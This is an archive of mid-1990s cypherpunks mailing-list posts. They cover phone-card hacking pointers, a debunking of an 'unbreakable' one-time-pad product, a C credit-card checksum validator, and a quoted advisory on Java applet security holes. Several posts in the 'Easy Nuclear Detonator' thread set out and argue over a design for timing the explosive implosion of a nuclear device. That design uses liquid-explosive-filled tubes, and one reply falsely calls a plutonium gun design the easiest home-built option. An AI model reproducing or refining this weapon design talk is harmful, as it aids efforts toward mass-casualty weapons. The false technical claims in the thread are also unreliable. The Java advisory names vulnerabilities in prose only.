From: Mutant <wlkngowl@unix.asb.com>
Date: Tue, 20 Feb 96 21:19:42 PST
To: cypherpunks@toad.com
Subject: Re: Telephone card tech. howto needed
Message-ID: <199602210516.AAA10665@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Kristian Sagi wrote:
[..]
> Only 6 are connected ... Has anyone ideas, how this card works ... i 
> something like telephone card hardware tutorials or something ... I [..]

What kind of telephone card?

Probably a smart card with PK crypto which isn't so easy to defeat.

In terms of technical details, check 2600 magazine (but avoid alt.2600,
since there's more noise there than this group has) or do a web search.
You might want to check other magazines like Hac Tic (no longer printed?)
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMSqqvSoZzwIn1bdtAQHIMQF+N7aisKNZZ+wM7sSUSRxfo7cZ2DC1maxR
8i3tFjE8yPc6CPbuQf4j5vwcPBa64D9N
=IPIj
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Philp <bplib@wat.hookup.net>
Date: Tue, 20 Feb 96 21:14:33 PST
To: IPG Sales <ipgsales@cyberstation.net>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <Pine.BSD/.3.91.960220140515.9829M-100000@citrine.cyberstation.net>
Message-ID: <Pine.OSF.3.91.960221001100.19136C-100000@nic.wat.hookup.net>
MIME-Version: 1.0
Content-Type: text/plain



I have just read your conditions for releasing the information tha the 
group felt was necessary to evaluate your product. A couple of comments.
First, the Cypherpunks are not an organized group who can agree to your 
conditions. This is simply a mailing list not a corporate entity to be 
contracted with. To attempt to treat them as such and to use their 
resources for your marketing gain is, in my opinion, less than honest. If 
the code has not been broken in 5 months, nothing will have been proved. 
A better model to follow would be that used (eventually) by Netscape. 
Release the code for comment and make changes based on weaknesses 
discovered by the group.
	My last point has to do with one of your restrictions. Why will 
you not release the information to Canadians? It cannot be ITAR, because 
it does not apply to Canadians. How can you claim that the Cypherpunks 
failed to break your system if you exclude its most brilliant members! <G>.

Regards from Canada, 
Tim Philp

===================================
For PGP Public Key, Send E-mail to:
pgp-public-keys@swissnet.ai.mit.edu
In Subject line type:
GET PHILP
===================================







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mutant <wlkngowl@unix.asb.com>
Date: Tue, 20 Feb 96 21:27:54 PST
To: cypherpunks@toad.com
Subject: ViaCryptPGP 4.0?! (was Re: PGP integrated into Z-Mail)
Message-ID: <199602210524.AAA10716@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

David A Wagner wrote:
[..]
>         A full review of Z-Mail for Windows and other Z-Mail products is
> available over NCD Software's site on the World Wide Web at
> http://www.ncd.com/Z-Code/zcode.html, or via e-mail at info@z-code.com.
> ViaCrypt information is available over the Web at http://www.viacrypt.com

ViaCrypt's page talks about a beta version of PGP 4.0 available
at some sites. Hmmm.

The Windows version is tantalizing. A PGP.DLL would be a wonderful thing.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMSqspioZzwIn1bdtAQHUYgGApl4OV143Q/LL2/mPC1m0PDHiGYbVB4xm
sB66fpLRrpjHBYxqYg/fGTL1rN6Z4Ydu
=OmqS
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mutant <wlkngowl@unix.asb.com>
Date: Tue, 20 Feb 96 21:48:38 PST
To: cypherpunks@toad.com
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
Message-ID: <199602210545.AAA10828@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

IPG Sales wrote:

[Notice "Sales" wrote this...]
> We are not currently revealing all the details of our system because of
> patents in process, and other relat6ed matters. We are offering the

Do you know what "patent pending" means?

> software. You should be able to readily decompile it and determine the
> algorithms used andf how they are used to generate random number sequences

If you're so concerned about secrecy and patents, why encourage anyone
to reverse engineer it?  If it's as secure as you say (and it's not)
and yet unpatented, then you sure as hell don't want anyone reverse
engineering it... you don't even want to publish the compiled binary
either (if that were true).

[..]
> If you are aware of encrtypting technology, you recognize that hardware
> prime number cycle wheels for the basis of some of the most secured
> hardware systems employed for encryption. We simply expand that 

You mean like Enigma machines? (chuckle)

> Thus we can eliminate the need to have the length of the OTP to be equal
> to the length of the file - if you do not belive that it works, try it
> and see - it takes inly a few hours to set such a trial up. We generated

OTP = One Time Pad
      ^^^
Used once. Not repeated. Equals the size of the file. Completely
erased from the cosmos after decryption and never seen again. Anything
else just isn't a one time pad.

> over 790 gigabytes of charcaters, on multiple backups, and tested. Our
> standard deviations, chi squares, Delta ICs for bits, characters, sets,
> and the entire set were random. The sets are random, and you can take
> that to the bank.

Gee. It sure looks random. Must be secure. [Sarcarm mode off]

> Someone, will decompile it and discover that it is truly random, at least
> from the practical usage basis. But we need that time to file patents,
> cvopyrights and the like.

Truly random? If it's based on an algorithm and not an unpredictable
source of external randomness, it just ain't random.

If it's fed the same seed, will it produce the same output? If so,
'taint random. Don't call it that. Just don't.

> The IPG system solves the key management problem and produces a truly

Oh really? And how does it do that? ...

[..]
> "Unless we know, we do not experience by talking," Plato

Interesting that you quote Plato, who believed in such fairy tales
as essential orbs of "truth", "beauty", etc. floating around in
some neuminal hyperspace.  Faith was rather important, and the western
religions were really damn peachy about it.

Oh, I get it... OTP stands for Onto-Theological Platonism. Philisophical 
snake oil...
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMSqxhCoZzwIn1bdtAQFrnwGAxffXmBmuZchYHTFapCNqc5xxiEqDy7BD
RL9cJeuP/2CHnVUgvfRX5uHfabPZz+Z7
=akNJ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@cs.byu.edu
Date: Wed, 21 Feb 96 00:12:57 PST
To: cypherpunks@toad.com
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <Pine.BSD/.3.91.960220184124.18188A-100000@citrine.cyberstation.net>
Message-ID: <199602210807.BAA00723@wero.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> > Do we have to show an exploitable flaw? Or we have to do the exploit? That
> > might be expensive. Who would judge the contest?
> > 
> > The alogrithm aside, IPG provides the intial OTP. Seems to me that IPG can
> > read the messages. End of story.
> > 
> Hedging, hedging, hedging - why? I did not noitice this in my first 

I think he meant that it might cost him several $10000 in computing time to
actually demonstrate a flaw, should it be found. Proving the flaw exists
should be enough. If a company really needs unbreakable encryption, a few
hundred thou isn't too much for an attacker to pay for million dollar secrets.
On the other hand, it would be quite a bit for an individual to come up with,
just to illustrate a point.

And this thing about keeping a copy of the one-time-pad, now just why is it
that you need to at all?? After all, if it doesn't arrive safely, then who
knows who has it... And if so, then you don't need a copy that could, say,
accidently get smuggled out and sold to [foreign government, domestic
covernment, competitor, curious onlooker - pick one] for the right sum of
money.

For your next version, you might want to add in the capability for a slight
remixing of the random pool at both ends (a passphrase, for example)
protected by secure-hashing properly-sized chunks. There's nothing like
being able to lock the door behind you, ya know...

Don
- -- 
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://students.cs.byu.edu/~don   or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Junk mail to root@fryser.dk.net
* This user insured by the Smith, Wesson, & Zimmermann insurance company *

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMSrSo8La+QKZS485AQFXeAL6AviaeMve7k6Oh1F5qix9EOBT29wSXXMa
NAcr8PSTFfQ7kd1FHz2A1N4OPXO+AW2vVPLWiulU/bcXoP5K/+mU36wM17bo9nXz
0tiVmyZcDV4bn6Vs373oYIKt2W0rj02K
=sJQO
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Tue, 20 Feb 96 23:41:01 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Web Browsers and Anonymous Mail (Was: NSA net trolling)
Message-ID: <199602210740.CAA13722@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Wayne Madsen wrote somewhere:
> A knowledgeable government source claims that
> the NSA has concluded agreements with [...] Netscape to
> permit the introduction of the means to prevent the anonymity of
> Internet electronic mail, [...]

I suspect this may actually mean that they're pushing Netscape to
incorporate cryptographic authentication into browser email, which I think is
a useful development. I'm not aware of any public remailers previously 
operated by Netscape Communications Corp. that have now shut down. ;)

At any rate, it's an excuse for me to ask some questions:

(0) I'm not aware of any class library objects or methods in stand-alone Java
for calling the local mail transport agent. Is there any class library 
support in Java+{Navigator, HotJava, Mosaic, NetCruiser, the AOL web tool, 
etc.} for applet calls to the local mail agent that's configured in the 
browser ?  

I would prefer not to reimplement SMTP using the Socket class in my own 
applets. Ideally I'd like to have an applet that presents a form with some 
entry boxes and check boxes, quantizes and encrypts the input according to 
the check box settings, and spews the resulting byte streams to the MTA. 

(1) As I recall, I used to be able to set (as an Option) the path and name of 
the local MTA (e.g. /usr/lib/sendmail) in an earlier version of Netscape. 
That seems to have disappeared in Navigator 2.0. Is there indeed no longer a 
way to set that ?  

It occurs to me that we could have achieved partial integration of
remailing into Navigator quite cheaply with that option.

Comments from Sun and/or Netscape and/or anyone else would be welcome.
Thanks :)

-Lewis	"You're always disappointed, nothing seems to keep you high -- drive 
	your bargains, push your papers, win your medals, fuck your strangers;
	don't it leave you on the empty side ?"  (Joni Mitchell, 1972)



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruce@aracnet.com>
Date: Wed, 21 Feb 96 18:23:33 PST
To: cypherpunks@toad.com
Subject: Re: "This is not Coderpunks--we don't need no steenking cryptography!"
Message-ID: <2.2.32.19960222022502.006956d0@mail.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:11 PM 2/21/96 -0800, tcmay@got.net (Timothy C. May) wrote:

>* Coderpunks -- number theory, DES, Haval, C/C++/Java, IETF and TCP/IP
>stuff, digital signatures, crypto libraries and APIs, Diffie-Hellman,
>BSAFE, RSAREF, etc.
>
>* Cypherpunks -- nuclear bomb triggers, why women are more free under the
>will of Allah than in Western decadent societies, movie reviews, SS
>Obergruppenfuhrer Zimmermann, Zambian newspapers, alien bases in
>Antarctica, Himalayan treks, etc.

Pretty much, yep. The only part of this that really annoys me is that there
isn't currently any real place to talk about actual crypto matters from a
user's point of view.

Sure, I can carve out space for myself on my own Web pages to talk about the
things that interest/concern me - and I have - but it's tough to find
anyplace to _learn_ in any way except random experimentation. And sure, if I
could read C well enough to puzzle through the remailer code and had the
UNIX knowledge necessary to compile and run one myself, for instance, I
could answer all my questions about remailer operation. But I don't. And I
wish I didn't have to. Unfortunately, there seems to be a huge gap between
the tiny handful of people who create the stuff and the bulk of us who are
merely interested in using it.

At this point, I acknowledge that I'm reinventing Alan's screed about how
"cypherpunks teach" should be as true as "cypherpunks write code". If more
people don't work on bridging the aforementioned gap, smart people of good
will who happen to be occupied enough with other things not to be able (or
interested) to become themselves good programmers and cryptographers are SOL.
 

-- 
Bruce Baugh
bruce@aracnet.com
http://www.aracnet.com/~bruce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 21 Feb 96 19:21:27 PST
To: cypherpunks@toad.com
Subject: "and two forms of ID"
Message-ID: <ad5121a01002100481f6@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:53 PM 2/21/96, Adam philipp wrote:

>   Don't forget to bring your public key fingerprint (and two forms of ID).
>If you can figure out how to get a PGP fingerprint on the back of a business
>card, that would be cool.

This is an unusual development, asking for "two forms of ID." If I attend,
can I use the "May Company" ID card I had printed up, or are only State of
California and El Cajon Public Library cards accepted?

We've had several key-signings in the Bay Area, and at none of the ones
I've seen has there been any demand for "two forms of ID." In fact, I
understand that some of the keys signed were for people whose nom de list
differs from what Sacramento knows them by. Lucky Green might want to
comment.

This gets back to the familiar issue of what it is a name credential really
means, and whether we care.

--Tim May, the name I use for this list


Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arley Carter <ac@hawk.twinds.com>
Date: Wed, 21 Feb 96 18:58:08 PST
To: IPG Sales <ipgsales@cyberstation.net>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <Pine.BSD/.3.91.960221151719.3814J-100000@citrine.cyberstation.net>
Message-ID: <Pine.HPP.3.91.960221215536.3550A-100000@hawk.twinds.com>
MIME-Version: 1.0
Content-Type: text/plain


Finally, an honest man at IPG. Y'all are a hoot. I'll hire you as bozos 
for my kid's next birthday party. 
ROTFL

Arley Carter
Tradewinds Technologies, Inc.
email: ac@hawk.twinds.com
www: http://www.twinds.com

"Trust me. This is a secure product. I'm from <insert your favorite 
corporation or government agency>."

 

 On Wed, 21 Feb 1996, IPG Sales wrote:

> We fess up - we are pig farmers from TexasL, we never have been to 
> these high fluting things you call schools, so we do not even 
> know what you are talking about, much less anything about Cryptography.
> 
> On Wed, 21 Feb 1996, Arley Carter wrote:
> 
> > On Tue, 20 Feb 1996, IPG Sales wrote:
> > 
> > Fess up guys. You are either:
> > 
> > 1.  A team of undergrads or graduate students conducting an "exploit". 
> > 2.  A Detweiller tentacle. Dr. FC ?
> > 3.  The return of Alice D'nonymous ?
> > 4.  The reason the coderpunks lists was started.
> > 
> > You've got to be ROTFL. 
> > See my sig.
> > 
> > Arley Carter
> > Tradewinds Technologies, Inc.
> > email: ac@hawk.twinds.com
> > www: http://www.twinds.com
> > 
> > "Trust me. This is a secure product. I'm from <insert your favorite 
> > corporation or government agency>."
> >  
> Appreciately,
> 
> Ralph
> 
> > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > > 
> > >  
> > >      
> > > 
> > > 
> > > 
> > >     
> > > 
> > > 
> > > 
> > > 
> > > 
> > 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Wed, 21 Feb 96 19:26:14 PST
To: cypherpunks@toad.com
Subject: Re: Credit card numbers
In-Reply-To: <Pine.LNX.3.91.960221151336.13150A-100000@mixolydian.scranton.com>
Message-ID: <0JJoJD44w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


> > Is there something like a checksum attached to Credit Card
> > Numbers. Or better: Is there a way to determine for a given
> > number N if
> >   -this _might_ be a valid number
> >   -this can't be a valid number

This was posted by Wayne D. Hoxsie Jr. <hoxsiew@crl.com>:

#include <stdio.h>

v(char *s)
{
  int i=0,j=0,k;

  k=!(!s[16]);
  for(;*s;*s++)
    i+=(++j%2-k)?(*s-'0')*2>9?((*s-'0')*2)-9:(*s-'0')*2:*s-'0';
  return (i%10);
}
main()
{
  char s[160];

  printf("Enter credit card number\n");
  scanf("%s",s);
  printf("Credit card number is %svalid\n",v(s)?"in":"");
}

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 21 Feb 96 23:24:03 PST
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Easy Nuclear Detonator
Message-ID: <m0tpUBd-00098SC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:56 PM 2/21/96 -0500, Black Unicorn wrote:
>On Sun, 18 Feb 1996, jim bell wrote:
>
>> -----BEGIN PGP SIGNED MESSAGE-----
>> 
>> At 10:25 PM 2/18/96 EDT, E. ALLEN SMITH wrote:
>> >	I've been kind of busy recently (the reason I haven't responded to
>> >the more recent Assasination Politics stuff), but I'm curious what 
>> >your method is for achieving simultaneous explosions.
>> 
>> 
>> "Multiple very thin flexible hollow tubes (1 mm ID? teflon?) filled with a
>> homogenous liquid 
>> explosive (for example, pure nitromethane), length accurately cut to produce 
>> the exactly desired delay.  Kept separated from each other by foam spacers 
>> to avoid inter-fiber detonations. Detonated from a single cap, with an 
>> intermediary chamber of liquid explosive to stabilize the shock front, the 
>> detonation wave travels along each tube simultaneously at (presumably) 
>> identical velocity."
>
>This method is so dependent on the uniformity of the initiator (the cap 
>in this instance) as to be nearly useless.  Normal blasting caps do not 
>detonate with the uniformity required to initiate each of the tube paths 
>at the same time.  In the off chance that you contemplated surrounding 
>the cap with liquid explosive of a sufficent type, (which still wouldn't 
>assure proper uniformity with any certainty as the liquid explosive is as 
>likely to detonate slightly off left to right as up to down) you still have 
>extremely difficult problems to overcome.

Re-read my whole statement.  I copy the relevant commentary that you
sloppily forgot to read:

>> Detonated from a single cap, with an 
>> intermediary chamber of liquid explosive to stabilize the shock front,

I already entirely anticipated your objection.  And destroyed it.

>1>  Interference from the milling shape and accuracy of the openings to 
>the tubes containing the liquid explosive.

Quantify, quantify.  How much of a problem?  (Hint:  If you seriously 
believed there was a problem with this idea, you would be able to give a few 
examples on how to avoid them.  Reading your commentary, you did none of 
this.  

>2>  Mild to obscure impurities in the liquid explosives causing 
>differences in velocity with respect to other tubes. 

All the tubes can be filled at the last minute by pulling a vacuum on the
system and letting atmospheric pressure fill all the tubes.  No impurities,
or at least it's a perfectly homogeneous mixture.

> Even small changes 
>in pressures within the tubes might cause enough timing problems to make 
>uniform initiation of the primary high explosive assembly impossible.

"might"?  Well, could you be more specific?  How many nanoseconds would be
too many?


>3>  Interference from the milling shape and accuracy of the terminus of 
>the tubes containing the liquid explosive.

So what's your point?

>4>  Overpressure in the device causing premature detonation of the near 
>portion of the high explosive assembly.

Sure about that?

>All of these might cause enough timing error to prevent uniform pressure 
>and thus prevent uniform compression and make supercriticality impossible.

Pigs might fly.

>Remember, kryonic switiches are necessary even when dealing with the 
>speeds of electric conductivity.  The velocities of even hydrazine based 
>explosives are signigicantly lower.  The margin for error is similarly lower.

How low?  Be specific.

>Plutonium gun is still the easiest method for the home grown nuclear 
>device, even if it requires more fissile material.

The "gun" design wasn't used with the plutonium, because IT WOULD NOT HAVE 
WORKED! "Fat Man," the bomb dropped on Nagasaki, used the implosion method.  
"Little Boy," the gun-method bomb, used U-235.   Plutonium detonates far too 
rapidly to use the "gun" method.   The 
scientists knew that in 1945.  You seem to be at least 50 years behind the 
times.

Sheesh!  I guess we now know what field YOU don't know about, huh?  Or, 
perhaps more likely, this is a specific DIS-information campaign.   You want 
someone to waste a critical-mass worth of plutonium.   





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Wed, 21 Feb 96 22:13:19 PST
To: cypherpunks@toad.com
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
Message-ID: <v01540b15ad51b7110c8c@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain


>Perry:
>
>"Stubborness and dogmatism are the surest signs of stupidity - is there
> anything more resolute and disdainful than an ass!" Montaigne
>
>You have an yellow streak down your back  infinitely wide - you may or
>may not be a physical coward but you are certainly an intellectual coward
>- you have the opportunity to save human lives, as you asserted and you
>just brushed that asside -

[etc. elided]

My personal theory is that Perry has developed a particularly nasty form of
multiple personality disorder and it is causing him to voraciously troll
himself on this list.

It's not going to be pretty, folks.


-------------------------------------------------------------------------
Steven Weller                      |  "The Internet, of course, is more
                                   |  than just a place to find pictures
                                   |  of people having sex with dogs."
stevenw@best.com                   |       -- Time Magazine, 3 July 1995






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruce@aracnet.com>
Date: Wed, 21 Feb 96 22:34:31 PST
To: cypherpunks@toad.com
Subject: Portland Cypherpunks Get-Together
Message-ID: <2.2.32.19960222063604.006858ac@mail.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I just wanted to remind y'all that this Saturday is the second quasi-monthly
Portland (OR) cypherpunks MST3K fest, key-signing, and general social event.
E-mail for further information.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEQAwUBMSwOAn3AXR8sjiylAQHoHAfRAZ0NJpB/pzmKwwRtJJygkQfE4vLQxrO3
f51RlzysBE3u7OFGnNYmy8QLXzsaclppN0ssfbFkxs13vwgiztudl9D3LkGrdw44
HgRAAV+FTuuR+nzehOc3DHQDDnPLoXh7NrS+bYfYGHv2GB8OZYpFXD5VEirJFmEj
uq7dEV4wy8+ml7BsMXxxZNwhP1ISRXvH9ODKLZnWx/6ngkFbzJBw1cvyHiuqjwRg
5HM31+HKSe5qi+Xx9ZlEfLY5d3U6HiN9cgKL+Jo301VGsZmEvIPyK0Yjyt4EUzgN
6vawqU6Kvzj76tOMe1lnUs3eSR4rUmNlaYXNRZuxy7FObqc=
=uaR5
-----END PGP SIGNATURE-----

-- 
Bruce Baugh
bruce@aracnet.com
http://www.aracnet.com/~bruce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Date: Wed, 21 Feb 96 19:38:34 PST
To: IPG Sales <ipgsales@cyberstation.net>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
Message-ID: <199602220345.WAA25647@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


IPG Sales <ipgsales@cyberstation.net> wrote:

>  See my reply to Tim Phillip - it is checked extensively 
> 
> If the algorithm sucks, prove it - please read the messages back and 

See my comment below.
[..]
> > [..]
> > > In general, you will find the kernel of the propgations consists of 64
> > > equation sets of the form:
> > > 
> > >        Bi=(Bi+Ci MOD Di) Mod 256             Large prime numbers
> > >        ENCRYPTEXTi=OTP[Bi] XOR PLAINTEXTi    Encryption
> > >        OTP[Bi]=ENCRYPTEXTi                   Makes the OTP Dynamic
> > 
> > Bah. Looks to me like simple garbling, only using a large stream.
> > 
> > Encrypt a stream of zeros with that method, and you'll get repeated
> > strings of OTP[Bi]'s.  An unsophisticated high school student could
> > crack that.


 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 21 Feb 96 19:39:07 PST
To: "Robichaux, Paul E" <perobich@ingr.com>
Subject: Re: BIG JAVA SECURITY HOLE
In-Reply-To: <c=US%a=_%p=INTERGRAPH%l=HQ6960221161902DK003B00@hq13.pcmail.ingr.com>
Message-ID: <199602220338.WAA11137@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Well, folks, I told you so. Sorry to be nasty about it.

> Date: Sun, 18 Feb 1996 23:57:02 -0500
> From: Drew Dean <ddean@CS.Princeton.EDU>
> Subject: Java security problems
> 
> We have discovered a serious security problem with Netscape Navigator's 2.0
> Java implementation.  (The problem is also present in the 1.0 release of the
> Java Development Kit from Sun.)  An applet is normally allowed to connect
> only to the host from which it was loaded.  However, this restriction is not
> properly enforced.  A malicious applet can open a connection to an arbitrary
> host on the Internet.  At this point, bugs in any TCP/IP-based network
> service can be exploited.  We have implemented (as a proof of concept) an
> exploitation of an old sendmail bug.
[...]
> A second, also serious, bug exists in javap, the bytecode
> disassembler.  An overly long method name can overflow a stack
> allocated buffer, potentially causing arbitrary native code to be
> executed.  The problem is an unchecked sprintf() call, just like the
> syslog(3) problem last year.
[...]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 21 Feb 96 19:57:59 PST
To: jim bell <jimbell@pacifier.com>
Subject: Re: Easy Nuclear Detonator
In-Reply-To: <m0toNuM-00091OC@pacifier.com>
Message-ID: <Pine.SUN.3.91.960221223902.13497F-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 18 Feb 1996, jim bell wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> At 10:25 PM 2/18/96 EDT, E. ALLEN SMITH wrote:
> >	I've been kind of busy recently (the reason I haven't responded to
> >the more recent Assasination Politics stuff), but I'm curious what 
> >your method is for achieving simultaneous explosions.
> 
> 
> "Multiple very thin flexible hollow tubes (1 mm ID? teflon?) filled with a
> homogenous liquid 
> explosive (for example, pure nitromethane), length accurately cut to produce 
> the exactly desired delay.  Kept separated from each other by foam spacers 
> to avoid inter-fiber detonations. Detonated from a single cap, with an 
> intermediary chamber of liquid explosive to stabilize the shock front, the 
> detonation wave travels along each tube simultaneously at (presumably) 
> identical velocity."

This method is so dependent on the uniformity of the initiator (the cap 
in this instance) as to be nearly useless.  Normal blasting caps do not 
detonate with the uniformity required to initiate each of the tube paths 
at the same time.  In the off chance that you contemplated surrounding 
the cap with liquid explosive of a sufficent type, (which still wouldn't 
assure proper uniformity with any certainty as the liquid explosive is as 
likely to detonate slightly off left to right as up to down) you still have 
extremely difficult problems to overcome.

1>  Interference from the milling shape and accuracy of the openings to 
the tubes containing the liquid explosive.

2>  Mild to obscure impurities in the liquid explosives causing 
differences in velocity with respect to other tubes.  Even small changes 
in pressures within the tubes might cause enough timing problems to make 
uniform initiation of the primary high explosive assembly impossible.

3>  Interference from the milling shape and accuracy of the terminus of 
the tubes containing the liquid explosive.

4>  Overpressure in the device causing premature detonation of the near 
portion of the high explosive assembly.

All of these might cause enough timing error to prevent uniform pressure 
and thus prevent uniform compression and make supercriticality impossible.

Remember, kryonic switiches are necessary even when dealing with the 
speeds of electric conductivity.  The velocities of even hydrazine based 
explosives are signigicantly lower.  The margin for error is similarly lower.

Plutonium gun is still the easiest method for the home grown nuclear 
device, even if it requires more fissile material.

> It's a race, designed so that the detonation waves reach their targets (the
> foci) at 
> the same time.  If the detonation velocity was, say, 5,000 meters per 
> second, an accuracy of 0.5 millimeter in length would produce a delay 
> accuracy  of 100 nanoseconds.
>
> Whatcha think?
> 
> Now where did I put that pit...   <G>
>
> Jim Bell
> jimbell@pacifier.com
> 
> Klaatu Burada Nikto
> 
> -----BEGIN PGP SIGNATURE-----
[...]
> -----END PGP SIGNATURE----- 

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 21 Feb 96 20:02:03 PST
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: Easy Nuclear Detonator
In-Reply-To: <Pine.BSF.3.91.960219221127.16659N-100000@mercury.thepoint.net>
Message-ID: <Pine.SUN.3.91.960221230005.13497G-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 19 Feb 1996, Brian Davis wrote:

> On Mon, 19 Feb 1996, jim bell wrote:
> 
> > it just didn't occur to me that you'd object to this.  "Nettiquette" is new
> > to me.                                                  ^^^^^^^^^^^^^^^^^^ > 
>   ^^^^^^
> 
> No shit.

So, it would seem, is nuclear weapons design.

> 
> > Jim Bell
> > 
> > jimbell@pacifier.com.
> 
> EBD
> 

---
